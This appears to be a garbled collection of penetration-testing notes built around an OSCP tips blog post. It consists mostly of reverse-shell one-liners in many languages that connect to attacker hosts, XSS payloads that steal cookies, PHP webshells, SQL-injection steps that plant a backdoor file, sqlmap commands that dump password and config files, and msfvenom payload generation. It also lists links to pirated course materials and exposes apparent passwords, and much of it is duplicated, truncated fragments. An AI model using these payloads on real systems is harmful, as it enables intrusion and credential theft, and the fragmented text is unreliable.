python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,12

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,12

PHP:

This code assumes that the TCP connection uses file descriptor 3.

php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’

php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’


If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK

NETCAT:

Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:

nc -e /bin/sh attackerip 4444

nc -e /bin/sh 192.168.37.10 443


If the -e option is disabled, try this

mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe

mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe

/bin/sh | nc attackerip 4444

/bin/sh | nc 192.168.23.10 443

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/

rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/

If you have the wrong version of netcat installed, try

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

TELNET:

If netcat is not available or /dev/tcp


mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

XTERM:

Xterm is the best..

To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do th

Xnest :1 # Note: The command starts with uppercase X

Xnest :1 # Note: The command starts with uppercase X

Then remember to authorise on your system the target IP to connect to you:

xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xt

xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab

xhost +targetip # Run this INSIDE the spawned xterm on the open X Server

If you want anyone to connect to this spawned xterm try:

xhost + # Run this INSIDE the spawned xterm on the open X Server
xhost + # Run this INSIDE the spawned xterm on the open X Server

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:

xterm -display attackerip:1

xterm -display attackerip:1

Or:

$ DISPLAY=attackerip:0 xterm

$ DISPLAY=attackerip:0 xterm

It will try to connect back to you, attackerip, on TCP port 6001.

Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:

/usr/openwin/bin/xterm -display attackerip:1

/usr/openwin/bin/xterm -display attackerip:1

PHP:

php -r ‘$sock=fsockopen(“192.168.0.100″,4444);exec(“/bin/sh -i <&3 >&3 2>&3″);’


JAVA:
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; don
p.waitFor()

XSS Cheat Codes:

(“< iframes > src=http://IP:PORT </ iframes >”)

<script>document.location=http://IP:PORT</script>

‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83

”;!–“<XSS>=&amp;amp;{()}

<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(‘XSS’)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp
<IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#00001
<IMG SRC=”jav ascript:alert(‘XSS’);”>

perl -e ‘print “<IMG SRC=javascript:alert(\”XSS\”)>”;’ > out

<BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

( “>< iframes http://google.de < iframes >)

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>

“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E

<img src=asdf onerror=alert(document.cookie)>

Useful Links To Read and Learn:


Enumeration:

http://www.0daysecurity.com/penetration-testing/enumeration.html
Windows Shellcode:

http://farlight.org/index.html?type=shellcode

http://shell-storm.org/shellcode/

http://www.windowsexploits.com/

XSS Cheat Codes:

http://www.xenuser.org/xss-cheat-sheet/

https://gist.github.com/sseffa/11031135

https://html5sec.org/

Reverse Shell Cheat Codes:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

http://roo7break.co.uk/?p=215

Webshells:
http://www.r57shell.net/

Nikto Tutorial:

http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/

Exploit-db:

wget http://exploit-db.com/archive.tar.bz2

SNMP Enumeration:

http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09

http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html

SAMBA Enumeration:

http://www.iodigitalsec.com/windows-null-session-enumeration/

http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions

http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html

http://www.madirish.net/59
Passhing The Hash:

https://www.kali.org/penetration-testing/passing-hash-remote-desktop/

https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/

Hashcat Tutorial:

http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/

Wordlist Download:

https://wiki.skullsecurity.org/Passwords

http://hqsoftwarecollection.blogspot.in/p/36gn-wordlist.html

NASM Tutorial:

http://en.kioskea.net/faq/1559-compiling-an-assembly-program-with-nasm
Buffer overflow Tutorial:

I consider this as intermediate and focus more on the real application exploit. Lupin from The Grey Corner explains expl

Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/beginning-stack-based-bu

SEH Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/seh-stack-based-wind

Windows Buffer Overflow Tutorial: Dealing with Character Translation – http://grey-corner.blogspot.com/2010/01/w

Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability – http://grey-corner.blogspot.com/2

Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump – http://grey-corner.blogspot.com/2010/02/

ADVANCED:

Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided most

Exploit writting tutorial part 1:Stack Based Overflows – http://www.corelan.be:8800/index.php/2009/07/19/exploit-w


Exploit writting tutorial part 2: Stack Based Overflows – jumping to shellcode – http://www.corelan.be:8800/index.php

Exploit writting tutorial part 3: SEH Based Exploits – http://www.corelan.be:8800/index.php/2009/07/25/writing-bu

Exploit writting tutorial part 3b: SEH Based Exploits – just another example – http://www.corelan.be:8800/index.php/

Exploit writting tutorial part 4: From Exploit to Metasploit – The basics – http://www.corelan.be:8800/index.php/2009

Exploit writting tutorial part 5: How debugger modules & plugins can speed up basic exploit development – http://www

Exploit writting tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR – http://www.corelan.be:8

Exploit writting tutorial part 7: Unicode – from 0x00410041 to calc – http://www.corelan.be:8800/index.php/2009/11

Exploit writting tutorial part 8: Win32 Egg Hunting – http://www.corelan.be:8800/index.php/2010/01/09/exploit-wr

Exploit writting tutorial part 9: Introduction to Win32 shellcoding – http://www.corelan.be:8800/index.php/2010/02/

SQL Injection Cheat Codes:

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

http://resources.infosecinstitute.com/backdoor-sql-injection/
RFI/LFI Tutorials:

https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/

http://www.hackersonlineclub.com/lfi-rfi

https://0xzoidberg.wordpress.com/category/security/lfi-rfi/

NMAP Vulsan:

http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz

Online Hash Cracking:

http://www.objectif-securite.ch/

Dump Windows Password Hashes:

http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html
Windows Previlige Escalation:

http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html

Linux Previlige Escalation:

http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://www.rebootuser.com/?p=1758

Tunneling & Port Forwarding:

http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html (Very Good)


http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
http://www.danscourses.com/Network-Penetration-Testing/metasploit-pivoting.html
http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
http://www.offensive-security.com/metasploit-unleashed/Portfwd
http://www.offensive-security.com/metasploit-unleashed/Pivoting
http://www.howtoforge.com/reverse-ssh-tunneling
http://ftp.acc.umu.se/pub/putty/putty-0.57/htmldoc/Chapter7.html (Plink)
http://www.offensive-security.com/metasploit-unleashed/Msfvenom

Useful Links:

http://www.fuzzysecurity.com/tutorials.html – Exploit tutorials


https://www.corelan.be/index.php/articles/ – Exploit tutorials
http://www.securitytube.net/ – Training videos
http://www.offensive-security.com/blog/ – Offensive Security blog
http://blog.g0tmi1k.com/ – Security blog
http://carnal0wnage.attackresearch.com
http://cybershakti.my3gb.com/
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.securityfocus.com/
http://www.exploit-db.com/
http://nmap.org/nsedoc/
http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
http://www.fuzzysecurity.com/tutorials/16.html
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://pentestmonkey.net/tools/windows-privesc-check

Videos:

http://www.securitytube.net/
http://www.rmccurdy.com/scripts/videos/ (milliworm exploit tutorial)
http://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html (Offensive Secuirty Lectures)

Privilege Escalation in Windows:

http://www.youtube.com/watch?v=kMG8IsCohHA Encyclopaedia Of Windows Privilege Escalation – Brett Moore


http://www.youtube.com/watch?v=_8xJaaQlpBo DerbyCon 3 0 2105 Windows Attacks At Is The New Black Rob Fuller A
http://www.greyhathacker.net/?p=738 Elevating privileges by exploiting weak folder permissions

Buffer Overflow Tutorial:


http://www.frequency.com/video/athcon-hack-in-paris-demo-1/40181156
http://www.savevid.com/video/athcon-hack-in-paris-demo-2.html
http://www.frequency.com/video/athcon-hack-in-paris-demo-3/11306148

https://www.youtube.com/watch?v=ANlROJNWtCs&list=PLM0IiVYClP2vC3A6Uz_ESV86kBVYei5qx (Python Penetratio

https://www.youtube.com/watch?v=Sye3mu-EoTI (Bash Scripting by Peter Chubb)

https://www.youtube.com/watch?v=GPjcSxyIIUc (BASH Scripting by Lee Baird )

https://www.youtube.com/watch?v=kPxavpgos2I (LFI/RFI)

https://www.youtube.com/watch?v=pnqcHU2qFiA (LFI/RFI)

http://www.securitytube.net/video/7640 (Simple buffer overflow)

https://www.youtube.com/watch?v=y2zrEAwmdws (Mona.py)

http://www.securitytube.net/video/7735 (Avoiding bad characters)


PDF:

https://www.yumpu.com/en/document/view/14963680/from-sqli-to-shell (SQL Injection)

https://cyberwar.nl/d/hak5.org_LinuxUnixBSDPost-ExploitationCommandList_copy-20130228.pdf (Linux Unix Post Ex

http://www.scribd.com/doc/245679444/hak5-org-OSXPost-Exploitation-copy-20130228-pdf#scribd (Post Exploitatio

http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf (Netcat)

http://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation.pdf (PHP Include and Post Exploitation

Best Book I refer:


http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641

Windows compiled Exploit Reference:

Those who have not enough lab time to compile their windows exploit, I will recommend you to download and compile

https://www.securitysift.com/offsec-pwb-oscp/

I uploaded those pre-compiled exploits in mediafire with password protected, but i discourage that becoz exploit comp

http://www.securitysift.com/download/MS_privesc_and_exploits_table.csv

I Hopes, It will helpful for guys who doing OSCP Training and Exam. If any doubts related to the post ping me…
About these ads
Tags: (OSCP), offsec, oscp exam hints, oscp exam tips, oscp lab hints, oscp lab tips, oscp tips, OSCP Tips and Tricks, oscp
fessional-handy-tips-and-tricks/

tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz


map -sI ip target
scan form diff IP)
e” start= auto error= ignore

ons /t REG_DWORD /d 0
PORT=443 RHOST=IP E
“<|<=” | sort -k3

code -t asp -o file.asp

-e x86/shikata_ga_nai -b “\x00″ -t c

Port to Connect On> R | msfencode -t elf -o shell

Connect On> R | msfencode -b “\x00\x0a\x0d”

onnect On> R > shell.py


Port to Connect On> R | msfencode -t asp -o shell.asp

nect On> R > shell.sh

o Connect On> R > shell.php

Port to Connect On> X >shell.exe


-u $user -l; done

-e x86/shikata_ga_nai -b “\x00″ -t c
r: while read line 0<&5; do $line 2>&5 >&5; done
DIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

DIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

$~->fdopen($c,w);system$_ while<>;’

$~->fdopen($c,w);system$_ while<>;’

me(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/
me(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/

open(cmd,”r”){|io|c.print io.read}end’

open(cmd,”r”){|io|c.print io.read}end’

”r”){|io|c.print io.read}end’

”r”){|io|c.print io.read}end’

&%d 2>&%d”,f,f,f)’

&%d 2>&%d”,f,f,f)’
EAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”

EAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”


port 6001). One way to do this is with Xnest: It is available on Ubuntu.

n this INSIDE the spawned xterm on the open X Server


your system:

eed to specify its filepath:


ine; do \$line 2>&5 >&5; done”] as String[])

(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCod

#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp
#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp

http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
henticated-smb-sessions
hashcat-0156543/
he Grey Corner explains exploit from basic to intermediate level with step by step debugging.

01/beginning-stack-based-buffer-overflow.html

10/01/seh-stack-based-windows-buffer-overflow.html

er.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html

/grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html

rner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html

one who has provided most comprehensive guides on exploit development and keeps updating from time to time that I have ever s

x.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
w.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

hp/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

lan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

it development – http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plu

R – http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep

be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/

php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/

e:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
ed-overflows/

scalation – Brett Moore


Is The New Black Rob Fuller And Chris Gates
BVYei5qx (Python Penetration Testing)

0228.pdf (Linux Unix Post Exploitation Command)

-pdf#scribd (Post Exploitation Command List)

Include and Post Exploitation)


you to download and compile the Mike Czumak Windows pre-compiled reference chart. I compiled it using Visual Studio and GNU C

rage that becoz exploit compilation is one of the exercise in the course so you have to do it your own. if anyone need that mail me at

o the post ping me…

, OSCP Tips and Tricks, oscp tricks, Penetration Testing with Kali Linux, The Offensive Security Certified Professional
(STDERR,”>&S”);exec(“/bin/sh -i”);};’
(STDERR,”>&S”);exec(“/bin/sh -i”);};’
ubprocess.call([“/bin/sh”,”-i”]);’

ubprocess.call([“/bin/sh”,”-i”]);’
PT>alert(String.fromCharCode(88,83,83))</SCRIPT>

mp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&am
mp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&
me to time that I have ever seen).
xample-part-3b/

-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/

tack-cookies-safeseh-hw-dep-and-aslr/
sing Visual Studio and GNU Code-blocks, really it will very useful at the time of exam.

anyone need that mail me at [email protected] (Note: don’t try to bruteforce it, its more than 20 words)

d Professional
mp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>
0108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#00
mp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>
&amp;amp;#0000041>
Sans 710: https://mega.nz/#!QNRxSaLY!sRHMVAyZ8f9Fqaq2O-g-5dVmU4WfIczgeaMz98kPGps
Sans 560: http://certcollection.org/forum/topic/292558-mega-sans-560-network-penetration-testing/
Sans 517: http://certcollection.org/forum/topic/292541-mega-sans-517-cutting-edge-hacking-techniques/
Sans 531: http://certcollection.org/forum/topic/292540-mega-sans-531-sans-windows-command-line-kung-fu/
Sans 617: http://certcollection.org/forum/topic/292539-mega-sans-617-wireless-ethical-hacking-penetration-testing-
Sans 506: http://certcollection.org/forum/topic/292493-mega-sans-506-securing-linuxunix/
Sans 508: http://certcollection.org/forum/topic/292127-mega-sans-508-advanced-digital-forensics-and-incident-resp
Sans 503: http://certcollection.org/forum/topic/292121-mega-sans-503-intrusion-detection-in-depth/
Sans 502: http://certcollection.org/forum/topic/292106-mega-sans-502-perimeter-protection-in-depth/
Sans 401: http://certcollection.org/forum/topic/292086-mega-sans-401-security-essentials/
Sans 610: http://certcollection.org/forum/topic/288694-mega-sans-610-reverse-engineering-malware/
Sans 660: http://certcollection.org/forum/topic/288708-mega-sans-660-advanced-pentration-testing-exploits-gxpn/

https://lab.pentestit.ru/
alok.3181
qwerty@123

mega.nz
5>]Y$gj@W<gC4JHJ

Awesome CTF
Captf.com -- search github
#CTF #wargame

https://io.netgarage.org/
http://reversing.kr/index.php
https://exploit-exercises.com/
http://smashthestack.org/
https://www.root-me.org/?page=news&lang=en
https://www.pwnerrank.com/categories/binary-exploitation/
https://w3challs.com/
https://pwnable.tw/
https://www.vulnhub.com/
https://ctftime.org/ctfs
https://shellterlabs.com/en/

vulnhub 136 --- last page direct web to terminal accesss


WordList Link :- https://blog.thireus.com/web-common-directories-and-filenames-word-lists-collect
ation-testing/
cking-techniques/
ommand-line-kung-fu/
hacking-penetration-testing-and-defenses/

l-forensics-and-incident-response/
ion-in-depth/
ction-in-depth/

ring-malware/
ation-testing-exploits-gxpn/
-filenames-word-lists-collection/
reverse_shell_all:
https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells

php -r '$sock=fsockopen("192.168.0.13",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

PHP one-line webshell: <?php echo exec($_GET["cmd"]);?>


netcat with -e option: http://192.168.2.120/logs/backup_log.php?cmd=nc -nlvp 2608 -e /bin/bash
python -c 'import pty;pty.spawn("/bin/bash")'

spawn shell : https://netsec.ws/?p=337

grep -i "kernel 2.6" files.csv


head platforms/linux/local/8572.c

whereis gcc

gcc platforms/linux/local/8572.c -o /tmp/evil


vi platforms/linux/local/8572.c
scp -C /tmp/out [email protected] -i /root/sshkey

-----------php----------
upload below as .png or sent it as part of input
<? readfile("/etc/passwd"); ?>

<? echo('test') ?> - test in burp if works, replace test with base64 of reverse php shell

Try in burp:
<?php
$out = file_get_contents($_REQUEST['f']);
echo "<pre>$outt</pre>";
?>
if works, cmd injection present, try below:
<?php
$cmd = ($_REQUEST["cmd"]);
$outt = exec($cmd);

in browser hash.php
try hash.php?cmd=pwd
nc -c /bin/sh 192.168.56.101 5600
nc -lvp 5600
python -c 'import pty; pty.spawn("/bin/bash")'
remote execution functions :: https://sekurak.pl/backdoory-w-aplikacjach-php/

echo "<pre>$outt</pre>";
?>

phpmyadmin --- run query and dump to php file


CREATE TABLE hacker(Stack TEXT) TYPE=MYSIaM;
INSERT INTO hacker VALUES(‘<pre><? @system($_REQUEST[“v”]); ?></pre>’); // upload a reverse shell

SELECT * INTO DUMPFILE '/var/www/backdoor.php' FROM hacker;

run in browser /backdoor.php?v=id

python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.


python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.
cat /pentest/database/sqlmap/output/192.168.0.112/files/_etc_passwd
find / -name apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.
tail /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.
grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_sites-enabled_000-defau
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.
cat /pentest/database/sqlmap/output/192.168.0.112/files/_var_www_configuration.php | grep -i pass -A 1 -B 1
// firefox -> 192.168.0.112:666/phpmyadmin/ # root yUtJklM97W

python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Log

python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Log

Below can be used with id and password box as well and then bd.php?cmd=ls
union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorek

whereis nc
/bin/nc.traditional 192.168.0.192 443 -e /bin/sh

for scan:
us -H -msf -Iv 192.168.1.88 -p 1-65535 && us -H -mU -Iv 192.168.1.88 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.88

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 -f raw > evil.php


